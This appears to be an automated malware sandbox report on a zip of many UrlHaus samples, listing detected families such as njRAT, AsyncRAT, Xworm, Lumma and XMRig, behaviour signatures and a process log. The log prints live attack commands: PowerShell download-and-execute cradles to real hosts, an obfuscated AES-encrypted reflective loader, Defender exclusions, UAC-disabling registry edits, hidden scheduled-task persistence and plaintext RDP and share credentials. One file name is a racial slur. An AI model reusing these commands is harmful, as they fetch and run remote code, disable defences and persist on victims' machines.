Analysis Overview
SHA256
74d74bfdd9852c7967a852d632c16dc347b358fead85c04b04a809d9a35fb2c9
Threat Level: Known bad
The file 241204-p9yjgs1nbp_pw_infected.zip was found to be: Known bad.
Malicious Activity Summary
Njrat family
Neshta
Neshta family
AsyncRat
Detect Xworm Payload
Ta505 family
Xworm family
XMRig Miner payload
AmmyyAdmin payload
Ammyyadmin family
Ammyy Admin
Xmrig family
Metasploit family
Xworm
TA505
Lumma Stealer, LummaC
Quasar family
njRAT/Bladabindi
Lumma family
ModiLoader, DBatLoader
Modiloader family
MetaSploit
Asyncrat family
Quasar RAT
Quasar payload
xmrig
Detect Neshta payload
Async RAT payload
ModiLoader Second Stage
Sets file to hidden
Indicator Removal: Network Share Connection Removal
Downloads MZ/PE file
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Creates new service(s)
Modifies Windows Firewall
Executes dropped EXE
VMProtect packed file
Loads dropped DLL
Themida packer
Checks computer location settings
Network Share Discovery
Looks up external IP address via web service
Power Settings
Legitimate hosting services abused for malware hosting/C2
UPX packed file
AutoIT Executable
Launches sc.exe
Detects Pyinstaller
Unsigned PE
Access Token Manipulation: Create Process with Token
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Embeds OpenSSL
Program crash
System Network Configuration Discovery: Internet Connection Discovery
NSIS installer
Scheduled Task/Job: Scheduled Task
Suspicious use of AdjustPrivilegeToken
Opens file in notepad (likely ransom note)
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Views/modifies file attributes
Runs net.exe
Delays execution with timeout.exe
Runs ping.exe
Suspicious use of SetWindowsHookEx
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-12-04 13:22
Signatures
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-04 13:22
Reported
2024-12-04 13:28
Platform
win10ltsc2021-20241023-en
Max time kernel
17s
Max time network
322s
Command Line
Signatures
Ammyy Admin
AmmyyAdmin payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Ammyyadmin family
AsyncRat
Asyncrat family
Detect Neshta payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lumma Stealer, LummaC
Lumma family
MetaSploit
Metasploit family
ModiLoader, DBatLoader
Modiloader family
Neshta
Neshta family
Njrat family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
TA505
Ta505 family
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xmrig family
Xworm
Xworm family
njRAT/Bladabindi
xmrig
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ModiLoader Second Stage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Downloads MZ/PE file
Indicator Removal: Network Share Connection Removal
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Stops running service(s)
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\niggers.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe | N/A |
Loads dropped DLL
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Network Share Discovery
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
Command and Scripting Interpreter: JavaScript
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Embeds OpenSSL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Program crash
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\UrlHausFiles\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\powershell.exe | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\niggers.exe
"C:\Users\Admin\AppData\Local\Temp\niggers.exe"
C:\Users\Admin\AppData\Local\Temp\niggers.exe
"C:\Users\Admin\AppData\Local\Temp\niggers.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\payload1.bat" "
C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe
"C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Noninteractive -windowstyle hidden -e UwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAALQBTAGMAbwBwAGUAIABQAHIAbwBjAGUAcwBzACAALQBGAG8AcgBjAGUAOwAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAALQBiAG8AcgAgADMAMAA3ADIAOwAgAGkAZQB4ACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADcANgAuADEAMQAxAC4AMQA3ADQALgAxADMAOAAvAHUAcwBlAHIAcwB5AG4AYwAvAHQAcgBhAGQAZQBkAGUAcwBrAC8AXwByAHAAJwApACkAKQApAA==
C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\26.ps1"
C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe
"C:\Users\Admin\Downloads\UrlHausFiles\HRFuUub.exe"
C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe
"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"
C:\Users\Admin\Downloads\UrlHausFiles\AV.scr
"C:\Users\Admin\Downloads\UrlHausFiles\AV.scr" /S
C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe
"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"
C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe
"C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe"
C:\Users\Admin\Downloads\UrlHausFiles\skikda.exe
"C:\Users\Admin\Downloads\UrlHausFiles\skikda.exe"
C:\Users\Admin\Downloads\UrlHausFiles\241.exe
"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 100 -ip 100
C:\Users\Admin\Downloads\UrlHausFiles\COMSurrogate.exe
"C:\Users\Admin\Downloads\UrlHausFiles\COMSurrogate.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 100 -s 1172
C:\Users\Admin\Downloads\UrlHausFiles\ddd.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ddd.exe"
C:\Users\Admin\Downloads\UrlHausFiles\241.exe
"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"
C:\Users\Admin\Downloads\UrlHausFiles\241.exe
"C:\Users\Admin\Downloads\UrlHausFiles\241.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd
C:\Users\Admin\Downloads\UrlHausFiles\ew.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"
C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe
"C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PowerShell" /tr "C:\Users\Admin\AppData\Roaming\PowerShell.exe"
C:\Users\Admin\Downloads\UrlHausFiles\rhnew.exe
"C:\Users\Admin\Downloads\UrlHausFiles\rhnew.exe"
C:\Users\Admin\Downloads\UrlHausFiles\file.exe
"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"
C:\Users\Admin\Downloads\UrlHausFiles\winnit.exe
"C:\Users\Admin\Downloads\UrlHausFiles\winnit.exe"
C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe
"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')"
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe
"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4960 -ip 4960
C:\Users\Admin\Downloads\UrlHausFiles\gU8ND0g.exe
"C:\Users\Admin\Downloads\UrlHausFiles\gU8ND0g.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
C:\Users\Admin\Downloads\UrlHausFiles\powershell.exe
powershell ping 127.0.0.1; del gU8ND0g.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 1448
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\1krecrypted.cmd" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')
C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe
"C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"
C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\Downloads\UrlHausFiles\1krecrypted.cmd';$ddkL='TrhqWFanshqWFfohqWFrmhqWFFihqWFnalhqWFBlhqWFochqWFkhqWF'.Replace('hqWF', ''),'DDPxXecoDPxXmDPxXprDPxXessDPxX'.Replace('DPxX', ''),'MaysmqinysmqMysmqodysmqulysmqeysmq'.Replace('ysmq', ''),'ReiHEpadiHEpLiiHEpnesiHEp'.Replace('iHEp', ''),'GCqdUetCqdUCuCqdUrCqdUreCqdUntPCqdUrCqdUocCqdUesCqdUsCqdU'.Replace('CqdU', ''),'InAKLIvoAKLIkAKLIeAKLI'.Replace('AKLI', ''),'LoJqASadJqAS'.Replace('JqAS', ''),'CopyfqFyTyfqFoyfqF'.Replace('yfqF', ''),'FrvXuAomvXuABvXuAasvXuAe6vXuA4StvXuArvXuAinvXuAgvXuA'.Replace('vXuA', ''),'CxbdihxbdianxbdigxbdieExbdixtexbdinxbdisixbdioxbdinxbdi'.Replace('xbdi', ''),'EleVQPZmeVQPZntVQPZAtVQPZ'.Replace('VQPZ', ''),'CNQbureaNQbutNQbueDNQbuecrNQbuypNQbutorNQbu'.Replace('NQbu', ''),'EoUdqnoUdqtoUdqryoUdqPoUdqoioUdqnoUdqtoUdq'.Replace('oUdq', ''),'ScSRUplcSRUitcSRU'.Replace('cSRU', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($ddkL[4])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rInUE($tsSXg){$AjjqB=[System.Security.Cryptography.Aes]::Create();$AjjqB.Mode=[System.Security.Cryptography.CipherMode]::CBC;$AjjqB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$AjjqB.Key=[System.Convert]::($ddkL[8])('N/y0OKPKBqPZJ+saNe6tgR7TAn10dih8XZ0HebZ+uEc=');$AjjqB.IV=[System.Convert]::($ddkL[8])('Ls3mytPz2eg1HzNec7G7VA==');$BtIij=$AjjqB.($ddkL[11])();$tfdFv=$BtIij.($ddkL[0])($tsSXg,0,$tsSXg.Length);$BtIij.Dispose();$AjjqB.Dispose();$tfdFv;}function UajxO($tsSXg){$coXbk=New-Object System.IO.MemoryStream(,$tsSXg);$PWDcH=New-Object System.IO.MemoryStream;$GMuYT=New-Object System.IO.Compression.GZipStream($coXbk,[IO.Compression.CompressionMode]::($ddkL[1]));$GMuYT.($ddkL[7])($PWDcH);$GMuYT.Dispose();$coXbk.Dispose();$PWDcH.Dispose();$PWDcH.ToArray();}$hqZyL=[System.IO.File]::($ddkL[3])([Console]::Title);$Hvhxu=UajxO (rInUE ([Convert]::($ddkL[8])([System.Linq.Enumerable]::($ddkL[10])($hqZyL, 5).Substring(2))));$LvPZo=UajxO (rInUE ([Convert]::($ddkL[8])([System.Linq.Enumerable]::($ddkL[10])($hqZyL, 6).Substring(2))));[System.Reflection.Assembly]::($ddkL[6])([byte[]]$LvPZo).($ddkL[12]).($ddkL[5])($null,$null);[System.Reflection.Assembly]::($ddkL[6])([byte[]]$Hvhxu).($ddkL[12]).($ddkL[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\Downloads\UrlHausFiles\file.exe" >> NUL
C:\Users\Admin\AppData\Local\Temp\is-9HKOQ.tmp\ClientServices.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9HKOQ.tmp\ClientServices.tmp" /SL5="$50056,965278,203776,C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe"
C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
C:\Users\Admin\Downloads\UrlHausFiles\tR7DLnB.exe
"C:\Users\Admin\Downloads\UrlHausFiles\tR7DLnB.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C timeout /T 3 & "C:\Users\Admin\Downloads\UrlHausFiles\ClientServices.exe" /VERYSILENT /SUPPRESSMSGBOXES
C:\Users\Admin\Downloads\UrlHausFiles\GI59vO6.exe
"C:\Users\Admin\Downloads\UrlHausFiles\GI59vO6.exe"
C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe
"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe
"C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe"
C:\Users\Admin\Downloads\UrlHausFiles\ewm.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ewm.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\timeout.exe
timeout /T 3
C:\Users\Admin\Downloads\UrlHausFiles\stail.exe
"C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"
C:\Users\Admin\AppData\Local\Temp\is-1FM0F.tmp\stail.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1FM0F.tmp\stail.tmp" /SL5="$2036C,3299853,54272,C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"
C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause powerful_player_1242
C:\Users\Admin\AppData\Local\Powerful Player 3.0.1.11\powerfulplayer3.exe
"C:\Users\Admin\AppData\Local\Powerful Player 3.0.1.11\powerfulplayer3.exe" -i
C:\Users\Admin\Downloads\UrlHausFiles\PXray_Cast_Sort.exe
"C:\Users\Admin\Downloads\UrlHausFiles\PXray_Cast_Sort.exe"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause powerful_player_1242
C:\Users\Admin\Downloads\UrlHausFiles\mi.exe
"C:\Users\Admin\Downloads\UrlHausFiles\mi.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"
C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2546.tmp\2547.tmp\2548.bat C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"
C:\Windows\system32\cmdkey.exe
cmdkey /generic: 211.168.94.177 /user:"exporter" /pass:"09EC^2n09"
C:\Windows\system32\mstsc.exe
mstsc /v: 211.168.94.177
C:\Users\Admin\Downloads\UrlHausFiles\IT_plan_cifs.exe
"C:\Users\Admin\Downloads\UrlHausFiles\IT_plan_cifs.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2AA5.tmp\2AA6.tmp\2AA7.bat C:\Users\Admin\Downloads\UrlHausFiles\IT_plan_cifs.exe"
C:\Users\Admin\Downloads\UrlHausFiles\sound.exe
"C:\Users\Admin\Downloads\UrlHausFiles\sound.exe"
C:\Windows\system32\net.exe
net use /delete * /y
C:\Windows\system32\net.exe
net use D: \\210.216.165.152\super_share smbtest@@ /user:smbtest /persistent:yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Users\Admin\Downloads\UrlHausFiles\idrB5Event.exe
"C:\Users\Admin\Downloads\UrlHausFiles\idrB5Event.exe"
C:\Users\Admin\Downloads\UrlHausFiles\ipscan.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ipscan.exe"
C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat
"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"
C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe
"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe
"C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"
C:\Users\Admin\Downloads\UrlHausFiles\random.exe
"C:\Users\Admin\Downloads\UrlHausFiles\random.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3E0E.tmp\3E0F.tmp\3E10.bat C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"
C:\Windows\system32\mshta.exe
mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
C:\Users\Admin\Downloads\UrlHausFiles\chisel.exe
"C:\Users\Admin\Downloads\UrlHausFiles\chisel.exe"
C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE
"C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE" goto :target
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4467.tmp\4477.tmp\4478.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE goto :target"
C:\Users\Admin\Downloads\UrlHausFiles\chrome_133.exe
"C:\Users\Admin\Downloads\UrlHausFiles\chrome_133.exe"
C:\Users\Admin\Downloads\UrlHausFiles\PCSupport.exe
"C:\Users\Admin\Downloads\UrlHausFiles\PCSupport.exe"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
